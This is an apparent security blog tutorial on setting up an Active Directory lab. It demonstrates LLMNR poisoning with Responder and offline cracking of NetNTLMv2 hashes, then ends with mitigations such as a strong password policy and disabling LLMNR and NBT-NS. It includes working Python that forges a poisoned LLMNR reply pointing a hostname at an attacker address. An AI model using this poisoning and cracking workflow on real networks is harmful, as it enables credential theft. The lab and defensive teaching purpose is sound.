Building an Active Directory Hacking Lab
Step 1: Overview
Active Directory (AD) remains a cornerstone of IT infrastructure for organizations worldwide, but it also continues to be a prime target for cyberattacks.
Why Active Directory?
Attackers target Active Directory because of its critical role in managing user access and permissions across enterprise networks. A compromised AD environment can provide attackers with the keys to the kingdom, enabling lateral movement, privilege escalation, and data exfiltration.
In the coming articles, we will be showing practical exercises on common attacks and some mitigation strategies. So without wasting any time, let us dive in and do the work.
Disclaimer: This is only for educational purposes. DO NOT try this on production environments or networks that you don’t have permission to access.
Step 2: Lab Environment Setup
The lab consists of:
- A Windows Server acting as the Domain Controller (DC).
- Two Windows 11 clients joined to the domain, with shared folders enabled.
- A hacker laptop running Kali Linux.
In this environment:
- Active Directory was installed and configured.
- Users, groups, and a SQL service were created to demonstrate the attacks.
- SMB shared folders were configured.
- Group Policy was applied to restrict Windows Defender Antivirus.
This setup provides a simple but realistic environment for simulating attacks and testing mitigation strategies. The goal is to find the weaknesses and then implement security controls against them.
Step 3: Initial attack: LLMNR poisoning
This step has four sub-steps:
- Set up Responder
- Generate an event, such as a user trying to reach a shared resource by a name DNS cannot resolve
- Capture the username, IP address and NetNTLMv2 hash
- Crack the NetNTLMv2 hash offline to recover the password
What is LLMNR Poisoning?
LLMNR stands for Link-Local Multicast Name Resolution. It is a protocol used on Windows networks to resolve hostnames to IP addresses when DNS returns no answer (for example, a mistyped share name) or is unavailable. Windows then multicasts the query to every host on the local link and accepts the first answer it gets, with no authentication.
In an LLMNR poisoning attack, an attacker runs a rogue responder on the network to answer those queries. When a client multicasts a request for the IP address of a hostname, the attacker's machine replies with its own IP, tricking the victim into connecting to the malicious system. Because the victim believes it is talking to a legitimate file server, it starts SMB authentication and sends its NetNTLMv2 challenge response to the attacker.
In this lab, the first attack targets name resolution using LLMNR poisoning. For it to work, you need the Responder tool installed on the Kali machine (it ships with Kali, and I installed it in my lab), and then you need to generate the events Responder captures. The demo below walks through it.
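To make the exchange concrete, here is an added example (my code, not code from the original post or from the Responder project) that builds the LLMNR query a Windows client multicasts when DNS has no answer, and the spoofed reply a poisoner sends back. The hostname `fileserv`, the transaction ID and the attacker address `10.10.14.5` are constructed lab values; the message layout follows RFC 4795, which reuses the DNS header and record formats.

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group and UDP port


def _encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def _decode_name(buf: bytes, off: int):
    """Return (name, offset just past the terminating zero byte)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(txid: int, hostname: str) -> bytes:
    """What the victim multicasts: header (QR=0, QDCOUNT=1) + one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + _encode_name(hostname) + struct.pack("!HH", 1, 1)


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner does: echo the victim's ID and question, set QR=1, and
    append an A record that points the name at the attacker. The reply is sent
    unicast back to the querier, and the first reply wins."""
    txid = struct.unpack("!H", query[:2])[0]
    name, off = _decode_name(query, 12)
    question = query[12:off + 4]                   # QNAME + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1, RCODE=0, ANCOUNT=1
    answer = _encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def parse_response(resp: bytes, expected_txid=None):
    """The only validation a client performs: it is a response and the ID matches.
    Returns (txid, name, ip) or None. Nothing here proves who answered."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", resp[:12])
    if not flags & 0x8000 or an < 1:
        return None
    if expected_txid is not None and txid != expected_txid:
        return None
    _, off = _decode_name(resp, 12)
    off += 4                                       # skip QTYPE/QCLASS of the echoed question
    name, off = _decode_name(resp, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
    off += 10
    return txid, name, socket.inet_ntoa(resp[off:off + rdlen])


if __name__ == "__main__":
    q = build_query(0x1234, "fileserv")            # victim asks the 224.0.0.252:5355 group
    r = build_poisoned_response(q, "10.10.14.5")   # attacker answers before anyone else
    print("query   :", q.hex())
    print("response:", r.hex())
    print("victim now resolves fileserv to", parse_response(r, 0x1234)[2])
```

The victim has no way to tell this reply from a legitimate one: LLMNR carries no signature and any host on the link can answer, which is exactly why Responder only needs to listen on the interface and reply fast. Responder performs the same trick for NBT-NS and mDNS queries, so the fix has to cover all three.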
1. Set up Responder. Start it on the Kali interface that faces the lab network and leave it listening.
2. Generate the event. For this demo, a user tried to access a shared resource by name. The access failed for the user, but the attacker intercepted the traffic and obtained the username together with a NetNTLMv2 hash, which is derived from the user's password.
NTLM (New Technology LAN Manager) is a challenge-response authentication protocol still widely used in Windows environments. It validates a user without sending the plaintext password: the server sends a random challenge and the client answers with a value computed from the challenge and the user's NT hash (an MD4 digest of the password). What Responder captures is that answer, a NetNTLMv2 challenge response, not the NT hash stored on the domain controller, so it cannot be passed in a pass-the-hash attack, but it can be cracked offline (or relayed) as you will see in sub-step 3.
3. Get the NetNTLMv2 hash.
We can see that Responder logged the victim's IP address, username and, most importantly, the NetNTLMv2 hash. This is not a good situation.
4. Crack the NetNTLMv2 hash.
Now let us try to recover the password from the hash. I used hashcat for the cracking; mode 5600 is the NetNTLMv2 format that Responder writes.
After cracking, we can see that the password is neither complex nor long enough. Short, guessable passwords are a huge security risk in organizational environments because a captured challenge response falls to a wordlist in seconds.
Step 4: Mitigation strategies
One of the most effective defenses is a strong password policy: a minimum of 15 characters, a mix of character classes, and a ban on common or easily guessable words, so that a captured NetNTLMv2 hash does not fall to a wordlist. The second is to disable LLMNR itself through Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > "Turn off multicast name resolution" set to Enabled (this writes the DWORD EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient). Note that Responder also poisons NBT-NS, so disable NetBIOS over TCP/IP on the adapters as well; otherwise the same capture still works over the older protocol.
This is part of my ongoing Active Directory Security Project. Stay tuned for the next project!
